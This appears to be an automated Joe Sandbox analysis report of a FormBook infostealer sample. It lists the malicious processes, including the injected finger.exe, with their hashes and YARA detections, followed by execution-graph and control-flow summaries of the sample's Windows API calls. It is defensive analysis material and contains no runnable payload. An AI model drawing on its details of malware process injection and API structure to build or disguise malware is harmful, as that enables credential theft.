                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe"
                                                                                                    Imagebase:0xc20000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:8
                                                                                                    Start time:08:15:30
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\finger.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                                    Imagebase:0x650000
                                                                                                    File size:13'824 bytes
                                                                                                    MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    Target ID:11
                                                                                                    Start time:08:15:43
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe"
                                                                                                    Imagebase:0xc20000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:13
                                                                                                    Start time:08:15:56
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                    Imagebase:0x7ff6d20e0000
                                                                                                    File size:676'768 bytes
                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.2%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:3.2%
                                                                                                      Total number of Nodes:251
                                                                                                      Total number of Limit Nodes:17
                                                                                                      execution_graph 46139 d8d01c 46140 d8d034 46139->46140 46141 d8d08e 46140->46141 46147 4dc0ad4 46140->46147 46156 4dc2c09 46140->46156 46165 4dc1ea8 46140->46165 46169 4dc0ac3 46140->46169 46178 4dc1ea7 46140->46178 46150 4dc0adf 46147->46150 46148 4dc2c79 46198 4dc0bfc 46148->46198 46150->46148 46151 4dc2c69 46150->46151 46182 4dc2e6c 46151->46182 46188 4dc2da0 46151->46188 46193 4dc2d90 46151->46193 46152 4dc2c77 46152->46152 46157 4dc2c45 46156->46157 46158 4dc2c79 46157->46158 46160 4dc2c69 46157->46160 46159 4dc0bfc CallWindowProcW 46158->46159 46161 4dc2c77 46159->46161 46162 4dc2e6c CallWindowProcW 46160->46162 46163 4dc2d90 CallWindowProcW 46160->46163 46164 4dc2da0 CallWindowProcW 46160->46164 46161->46161 46162->46161 46163->46161 46164->46161 46166 4dc1ece 46165->46166 46167 4dc0ad4 CallWindowProcW 46166->46167 46168 4dc1eef 46167->46168 46168->46141 46170 4dc0adf 46169->46170 46171 4dc2c79 46170->46171 46173 4dc2c69 46170->46173 46172 4dc0bfc CallWindowProcW 46171->46172 46174 4dc2c77 46172->46174 46175 4dc2e6c CallWindowProcW 46173->46175 46176 4dc2d90 CallWindowProcW 46173->46176 46177 4dc2da0 CallWindowProcW 46173->46177 46174->46174 46175->46174 46176->46174 46177->46174 46179 4dc1ece 46178->46179 46180 4dc0ad4 CallWindowProcW 46179->46180 46181 4dc1eef 46180->46181 46181->46141 46183 4dc2e2a 46182->46183 46184 4dc2e7a 46182->46184 46202 4dc2e58 46183->46202 46205 4dc2e48 46183->46205 46185 4dc2e40 46185->46152 46190 4dc2db4 46188->46190 46189 4dc2e40 46189->46152 46191 4dc2e58 CallWindowProcW 46190->46191 46192 4dc2e48 CallWindowProcW 46190->46192 46191->46189 46192->46189 46195 4dc2db4 46193->46195 46194 4dc2e40 46194->46152 46196 4dc2e58 CallWindowProcW 46195->46196 46197 4dc2e48 CallWindowProcW 46195->46197 46196->46194 46197->46194 46199 4dc0c07 46198->46199 46200 4dc435a CallWindowProcW 46199->46200 46201 4dc4309 46199->46201 46200->46201 46201->46152 46203 4dc2e69 46202->46203 46208 4dc42a0 46202->46208 46203->46185 46206 4dc2e69 46205->46206 46207 4dc42a0 CallWindowProcW 46205->46207 46206->46185 46207->46206 46209 4dc0bfc CallWindowProcW 46208->46209 46210 4dc42aa 46209->46210 46210->46203 46436 6d58f20 46437 6d590ab 46436->46437 46439 6d58f46 46436->46439 46439->46437 46440 6d569bc 46439->46440 46441 6d591a0 PostMessageW 46440->46441 46442 6d5920c 46441->46442 46442->46439 46416 6d574f2 46418 6d571f4 46416->46418 46417 6d57203 46418->46417 46419 6d57c3e 12 API calls 46418->46419 46420 6d57bc9 12 API calls 46418->46420 46421 6d57bd8 12 API calls 46418->46421 46419->46418 46420->46418 46421->46418 46443 277b2c0 46444 277b302 46443->46444 46445 277b308 GetModuleHandleW 46443->46445 46444->46445 46446 277b335 46445->46446 46211 4dc68c0 46213 4dc68d5 46211->46213 46212 4dc6b61 46213->46212 46217 5963298 46213->46217 46223 59632a8 46213->46223 46214 4dc6b59 46218 59632a8 46217->46218 46220 596330e 46218->46220 46229 5962164 46218->46229 46233 5963468 46218->46233 46219 59632f0 46220->46214 46224 59632d7 46223->46224 46226 596330e 46223->46226 46224->46226 46227 5962164 2 API calls 46224->46227 46228 5963468 2 API calls 46224->46228 46225 59632f0 46226->46214 46227->46225 46228->46225 46230 596216f 46229->46230 46231 59634a2 46230->46231 46237 5962174 46230->46237 46231->46219 46234 5963486 46233->46234 46235 59634a2 46234->46235 46236 5962174 2 API calls 46234->46236 46235->46219 46236->46235 46238 596217f 46237->46238 46239 596353b 46238->46239 46245 596358d 46238->46245 46248 5962194 46238->46248 46241 596354e 46239->46241 46242 5962194 CloseHandle 46239->46242 46252 59679c8 46241->46252 46259 59679b8 46241->46259 46242->46241 46243 596357c 46268 59621a4 46243->46268 46249 596219f 46248->46249 46250 59621a4 CloseHandle 46249->46250 46251 59636d6 46250->46251 46251->46239 46253 59679ee 46252->46253 46256 5967a20 46252->46256 46253->46243 46254 5967a73 46257 5962194 CloseHandle 46254->46257 46258 5967a86 46254->46258 46255 5962194 CloseHandle 46255->46254 46256->46254 46256->46255 46257->46258 46258->46243 46260 5967953 CloseHandle 46259->46260 46264 59679bf 46259->46264 46261 596797f 46260->46261 46261->46243 46262 59679ee 46262->46243 46263 5967a73 46266 5962194 CloseHandle 46263->46266 46267 5967a86 46263->46267 46264->46262 46264->46263 46265 5962194 CloseHandle 46264->46265 46265->46263 46266->46267 46267->46243 46269 59621af 46268->46269 46271 59637af 46269->46271 46272 59623a8 46269->46272 46271->46245 46273 59623b3 46272->46273 46274 5963d2e 46273->46274 46277 59676a0 46273->46277 46280 596768f 46273->46280 46291 59671f4 46277->46291 46279 59676b7 46279->46274 46281 5967693 46280->46281 46282 5967627 46280->46282 46283 596769a 46281->46283 46286 5967714 46281->46286 46282->46274 46284 59671f4 CloseHandle 46283->46284 46285 59676b7 46284->46285 46285->46274 46286->46274 46287 59677ae 46286->46287 46288 59677df 46286->46288 46298 596720c CloseHandle 46287->46298 46288->46274 46290 59677c9 46290->46274 46292 59676d0 46291->46292 46292->46279 46293 59677ae 46292->46293 46294 59677df 46292->46294 46297 596720c CloseHandle 46293->46297 46294->46279 46296 59677c9 46296->46279 46297->46296 46298->46290 46299 5961048 46300 5961082 46299->46300 46301 5961113 46300->46301 46305 5961140 46300->46305 46310 5961130 46300->46310 46302 5961109 46306 59615a2 46305->46306 46307 596116e 46305->46307 46306->46302 46307->46306 46315 59627c0 46307->46315 46321 59627af 46307->46321 46311 59615a2 46310->46311 46312 596116e 46310->46312 46311->46302 46312->46311 46313 59627c0 2 API calls 46312->46313 46314 59627af 2 API calls 46312->46314 46313->46311 46314->46311 46328 596211c 46315->46328 46318 59627e7 46318->46306 46319 5962810 CreateIconFromResourceEx 46320 596288e 46319->46320 46320->46306 46322 59627c0 46321->46322 46323 596211c CreateIconFromResourceEx 46322->46323 46325 59627da 46323->46325 46324 59627e7 46324->46306 46325->46324 46326 5962810 CreateIconFromResourceEx 46325->46326 46327 596288e 46326->46327 46327->46306 46329 5962810 CreateIconFromResourceEx 46328->46329 46330 59627da 46329->46330 46330->46318 46330->46319 46331 2774668 46332 2774672 46331->46332 46336 2774758 46331->46336 46341 2773e34 46332->46341 46334 277468d 46337 2774765 46336->46337 46345 2774868 46337->46345 46349 2774858 46337->46349 46342 2773e3f 46341->46342 46357 2775d24 46342->46357 46344 2776f8f 46344->46334 46347 277488f 46345->46347 46346 277496c 46346->46346 46347->46346 46353 27744b4 46347->46353 46351 277488f 46349->46351 46350 277496c 46351->46350 46352 27744b4 CreateActCtxA 46351->46352 46352->46350 46354 27758f8 CreateActCtxA 46353->46354 46356 27759bb 46354->46356 46358 2775d2f 46357->46358 46361 2775da4 46358->46361 46360 27771bd 46360->46344 46362 2775daf 46361->46362 46365 2775dd4 46362->46365 46364 277729a 46364->46360 46366 2775ddf 46365->46366 46369 2775df4 46366->46369 46368 277738d 46368->46364 46371 2775dff 46369->46371 46370 2778929 46370->46368 46371->46370 46374 277d090 46371->46374 46379 277d080 46371->46379 46375 277d0b1 46374->46375 46376 277d0d5 46375->46376 46384 277d240 46375->46384 46388 277d1fd 46375->46388 46376->46370 46381 277d0b1 46379->46381 46380 277d0d5 46380->46370 46381->46380 46382 277d240 CreateWindowExW 46381->46382 46383 277d1fd CreateWindowExW 46381->46383 46382->46380 46383->46380 46385 277d24d 46384->46385 46386 277d287 46385->46386 46393 277cb78 46385->46393 46386->46376 46389 277d1a0 46388->46389 46390 277d220 46388->46390 46391 277d287 46390->46391 46392 277cb78 CreateWindowExW 46390->46392 46391->46376 46392->46391 46394 277cb83 46393->46394 46396 277db98 46394->46396 46397 277cca4 46394->46397 46396->46396 46398 277ccaf 46397->46398 46399 2775df4 CreateWindowExW 46398->46399 46400 277dc07 46399->46400 46404 277f980 46400->46404 46410 277f968 46400->46410 46401 277dc41 46401->46396 46406 277f9b1 46404->46406 46407 277fab1 46404->46407 46405 277f9bd 46405->46401 46406->46405 46408 4dc0dc8 CreateWindowExW 46406->46408 46409 4dc0db8 CreateWindowExW 46406->46409 46407->46401 46408->46407 46409->46407 46412 277f9b1 46410->46412 46413 277fab1 46410->46413 46411 277f9bd 46411->46401 46412->46411 46414 4dc0dc8 CreateWindowExW 46412->46414 46415 4dc0db8 CreateWindowExW 46412->46415 46413->46401 46414->46413 46415->46413 46422 277d358 46423 277d39e 46422->46423 46427 277d538 46423->46427 46430 277d528 46423->46430 46424 277d48b 46433 277cc40 46427->46433 46431 277d566 46430->46431 46432 277cc40 DuplicateHandle 46430->46432 46431->46424 46432->46431 46434 277d5a0 DuplicateHandle 46433->46434 46435 277d566 46434->46435 46435->46424
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ff3b11e7cb8da0bfe1a73cdc20cff99c704ad8cc2431b6009ff4b5e7ea147fc9
                                                                                                      • Instruction ID: 31ae55791c2fd497631beef50b6c766afd232fc0f603f7ec60009066b8d57cc4
                                                                                                      • Opcode Fuzzy Hash: ff3b11e7cb8da0bfe1a73cdc20cff99c704ad8cc2431b6009ff4b5e7ea147fc9
                                                                                                      • Instruction Fuzzy Hash: 65424070E002188FEB54DFA9C854B9EBBF2FF84300F14856AD44AAB395DB349D45DBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 74a252d08cdd1c9501f95a373b9f8b15744ffa07584262fe1a8b160cf2373caf
                                                                                                      • Instruction ID: a49d5b5b5f3e81428d7264803d7e3430d22edf78c661cb12a5a300ba1f1b37a4
                                                                                                      • Opcode Fuzzy Hash: 74a252d08cdd1c9501f95a373b9f8b15744ffa07584262fe1a8b160cf2373caf
                                                                                                      • Instruction Fuzzy Hash: 72B12975E002198FDB15CFA5D880B9EBBF2FF84310F18C56AD409AB255EB34E989DB50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 12 6d56dcd-6d56e6d 14 6d56ea6-6d56ec6 12->14 15 6d56e6f-6d56e79 12->15 22 6d56eff-6d56f2e 14->22 23 6d56ec8-6d56ed2 14->23 15->14 16 6d56e7b-6d56e7d 15->16 17 6d56ea0-6d56ea3 16->17 18 6d56e7f-6d56e89 16->18 17->14 20 6d56e8d-6d56e9c 18->20 21 6d56e8b 18->21 20->20 25 6d56e9e 20->25 21->20 31 6d56f67-6d57021 CreateProcessA 22->31 32 6d56f30-6d56f3a 22->32 23->22 24 6d56ed4-6d56ed6 23->24 26 6d56ef9-6d56efc 24->26 27 6d56ed8-6d56ee2 24->27 25->17 26->22 29 6d56ee4 27->29 30 6d56ee6-6d56ef5 27->30 29->30 30->30 33 6d56ef7 30->33 43 6d57023-6d57029 31->43 44 6d5702a-6d570b0 31->44 32->31 34 6d56f3c-6d56f3e 32->34 33->26 36 6d56f61-6d56f64 34->36 37 6d56f40-6d56f4a 34->37 36->31 38 6d56f4c 37->38 39 6d56f4e-6d56f5d 37->39 38->39 39->39 41 6d56f5f 39->41 41->36 43->44 54 6d570c0-6d570c4 44->54 55 6d570b2-6d570b6 44->55 57 6d570d4-6d570d8 54->57 58 6d570c6-6d570ca 54->58 55->54 56 6d570b8 55->56 56->54 59 6d570e8-6d570ec 57->59 60 6d570da-6d570de 57->60 58->57 61 6d570cc 58->61 63 6d570fe-6d57105 59->63 64 6d570ee-6d570f4 59->64 60->59 62 6d570e0 60->62 61->57 62->59 65 6d57107-6d57116 63->65 66 6d5711c 63->66 64->63 65->66 68 6d5711d 66->68 68->68
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D5700E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 26d0b1f90ad1163c248e1e111efe6a870f5b10180a30945a55db02f2341980ab
                                                                                                      • Instruction ID: ada3da51de9a52e6ca7a83d34b2fc9b4b751f70171e49fb2fbe7e4de186553ff
                                                                                                      • Opcode Fuzzy Hash: 26d0b1f90ad1163c248e1e111efe6a870f5b10180a30945a55db02f2341980ab
                                                                                                      • Instruction Fuzzy Hash: CAA17A71D00259CFEF60CF69CC40BDEBBB2AF48310F15856AE808A7690DB759985CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 69 6d56dd8-6d56e6d 71 6d56ea6-6d56ec6 69->71 72 6d56e6f-6d56e79 69->72 79 6d56eff-6d56f2e 71->79 80 6d56ec8-6d56ed2 71->80 72->71 73 6d56e7b-6d56e7d 72->73 74 6d56ea0-6d56ea3 73->74 75 6d56e7f-6d56e89 73->75 74->71 77 6d56e8d-6d56e9c 75->77 78 6d56e8b 75->78 77->77 82 6d56e9e 77->82 78->77 88 6d56f67-6d57021 CreateProcessA 79->88 89 6d56f30-6d56f3a 79->89 80->79 81 6d56ed4-6d56ed6 80->81 83 6d56ef9-6d56efc 81->83 84 6d56ed8-6d56ee2 81->84 82->74 83->79 86 6d56ee4 84->86 87 6d56ee6-6d56ef5 84->87 86->87 87->87 90 6d56ef7 87->90 100 6d57023-6d57029 88->100 101 6d5702a-6d570b0 88->101 89->88 91 6d56f3c-6d56f3e 89->91 90->83 93 6d56f61-6d56f64 91->93 94 6d56f40-6d56f4a 91->94 93->88 95 6d56f4c 94->95 96 6d56f4e-6d56f5d 94->96 95->96 96->96 98 6d56f5f 96->98 98->93 100->101 111 6d570c0-6d570c4 101->111 112 6d570b2-6d570b6 101->112 114 6d570d4-6d570d8 111->114 115 6d570c6-6d570ca 111->115 112->111 113 6d570b8 112->113 113->111 116 6d570e8-6d570ec 114->116 117 6d570da-6d570de 114->117 115->114 118 6d570cc 115->118 120 6d570fe-6d57105 116->120 121 6d570ee-6d570f4 116->121 117->116 119 6d570e0 117->119 118->114 119->116 122 6d57107-6d57116 120->122 123 6d5711c 120->123 121->120 122->123 125 6d5711d 123->125 125->125
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D5700E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: d133a20e857400e364e49a87525e2b9e4e2cf25e77bfed581890b7ba314587e5
                                                                                                      • Instruction ID: 300059c013b8048a19dfefbd095e638d24e1014c2bf4f7652953fc2dc2daeec3
                                                                                                      • Opcode Fuzzy Hash: d133a20e857400e364e49a87525e2b9e4e2cf25e77bfed581890b7ba314587e5
                                                                                                      • Instruction Fuzzy Hash: 5C915971D00259CFEF60CF69CC40B9EBBF2AF48310F1585AAE808A7690DB759985CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 126 4dc0aa8-4dc1d56 128 4dc1d58-4dc1d5e 126->128 129 4dc1d61-4dc1d68 126->129 128->129 130 4dc1d6a-4dc1d70 129->130 131 4dc1d73-4dc1e12 CreateWindowExW 129->131 130->131 133 4dc1e1b-4dc1e53 131->133 134 4dc1e14-4dc1e1a 131->134 138 4dc1e55-4dc1e58 133->138 139 4dc1e60 133->139 134->133 138->139 140 4dc1e61 139->140 140->140
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DC1E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 3cbcb82ccc02fee776882b6d781f1f755df5da4c764981a9ef1b607b68a8491f
                                                                                                      • Instruction ID: 99aa823fb126f17babcf5617b9cb61351a9aeae6efc18c60b22d61a27938da1c
                                                                                                      • Opcode Fuzzy Hash: 3cbcb82ccc02fee776882b6d781f1f755df5da4c764981a9ef1b607b68a8491f
                                                                                                      • Instruction Fuzzy Hash: 5D51B0B1D00319DFDB14CF9AC984ADEBBB6BF48710F24812EE819AB211D771A845CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 141 4dc1cef-4dc1d56 142 4dc1d58-4dc1d5e 141->142 143 4dc1d61-4dc1d68 141->143 142->143 144 4dc1d6a-4dc1d70 143->144 145 4dc1d73-4dc1dab 143->145 144->145 146 4dc1db3-4dc1e12 CreateWindowExW 145->146 147 4dc1e1b-4dc1e53 146->147 148 4dc1e14-4dc1e1a 146->148 152 4dc1e55-4dc1e58 147->152 153 4dc1e60 147->153 148->147 152->153 154 4dc1e61 153->154 154->154
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DC1E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: c33b1cd874006980d18d64525f9858fbebf1e17aae0591e5118cbdf8d870bae2
                                                                                                      • Instruction ID: bb3f3f35224ab4ee26cf019bea21b71ff9c2af25bd4bc07c50d6a4bf7e0c9469
                                                                                                      • Opcode Fuzzy Hash: c33b1cd874006980d18d64525f9858fbebf1e17aae0591e5118cbdf8d870bae2
                                                                                                      • Instruction Fuzzy Hash: 1941A0B1D00319DFDB14CF9AC884ADEBBB5BF88710F24812EE819AB211D775A945CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 177 4dc0bfc-4dc42fc 180 4dc43ac-4dc43cc call 4dc0ad4 177->180 181 4dc4302-4dc4307 177->181 188 4dc43cf-4dc43dc 180->188 182 4dc4309-4dc4340 181->182 183 4dc435a-4dc4392 CallWindowProcW 181->183 190 4dc4349-4dc4358 182->190 191 4dc4342-4dc4348 182->191 186 4dc439b-4dc43aa 183->186 187 4dc4394-4dc439a 183->187 186->188 187->186 190->188 191->190
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DC4381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallProcWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2714655100-0
                                                                                                      • Opcode ID: 86d44073afee3e6b9a856f179be298bb520b0e7731cf7ccaa312bebd857bc920
                                                                                                      • Instruction ID: f99947aff0d07c283668215927985d82e3d5326e445a4908c11e306f17715440
                                                                                                      • Opcode Fuzzy Hash: 86d44073afee3e6b9a856f179be298bb520b0e7731cf7ccaa312bebd857bc920
                                                                                                      • Instruction Fuzzy Hash: 7C4118B590030A9FDB14CF99C888AAABBF5FB88714F24855DD419A7361D774A841CBA0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 155 27758ed-277596c 156 277596f-27759b9 CreateActCtxA 155->156 158 27759c2-2775a1c 156->158 159 27759bb-27759c1 156->159 166 2775a1e-2775a21 158->166 167 2775a2b-2775a2f 158->167 159->158 166->167 168 2775a31-2775a3d 167->168 169 2775a40-2775a70 167->169 168->169 173 2775a22-2775a27 169->173 174 2775a72-2775af4 169->174 173->167
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027759A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 8a455d63690ddb26b542ef287c526cd52ccb2a348a0fe92e89b1ef8c083a5ce1
                                                                                                      • Instruction ID: b2dac8b410b3f574673136eea0dc805523bb3f5efa72abcef4e7b080e601abd2
                                                                                                      • Opcode Fuzzy Hash: 8a455d63690ddb26b542ef287c526cd52ccb2a348a0fe92e89b1ef8c083a5ce1
                                                                                                      • Instruction Fuzzy Hash: 3A41B3B1D00719CFEB24DFA9C88479EBBF5BF88704F60816AD408AB251DB756946CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 194 27744b4-27759b9 CreateActCtxA 198 27759c2-2775a1c 194->198 199 27759bb-27759c1 194->199 206 2775a1e-2775a21 198->206 207 2775a2b-2775a2f 198->207 199->198 206->207 208 2775a31-2775a3d 207->208 209 2775a40-2775a70 207->209 208->209 213 2775a22-2775a27 209->213 214 2775a72-2775af4 209->214 213->207
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027759A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 78dccbbcae92c5ea401f61385eb3fc1d27bd75e0be0416db3881586efa9fa8b6
                                                                                                      • Instruction ID: 7f1175e9c6d584933f38214de56e614191e3eaaf46c068ab9eef798586b0d78c
                                                                                                      • Opcode Fuzzy Hash: 78dccbbcae92c5ea401f61385eb3fc1d27bd75e0be0416db3881586efa9fa8b6
                                                                                                      • Instruction Fuzzy Hash: 4E41B2B1D00719CBEB24DFA9C84479EBBF5BF88704F60816AD408AB251DB756945CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 217 2775a64-2775a70 218 2775a22-2775a27 217->218 219 2775a72-2775af4 217->219 222 2775a2b-2775a2f 218->222 223 2775a31-2775a3d 222->223 224 2775a40-2775a41 222->224 223->224 224->217
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e0eebe879825dc605f2e9525d309c22402d718ea0eccba90363d936b75c61ec5
                                                                                                      • Instruction ID: 1fd165fb650cc61333d5474fe5cf8ff598808fc29e418715600704830bdef1a5
                                                                                                      • Opcode Fuzzy Hash: e0eebe879825dc605f2e9525d309c22402d718ea0eccba90363d936b75c61ec5
                                                                                                      • Instruction Fuzzy Hash: C831DCB1804749CFEF01DFA4C8457EEBBF1AF86708F944199C416AB291C779990ACF01

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
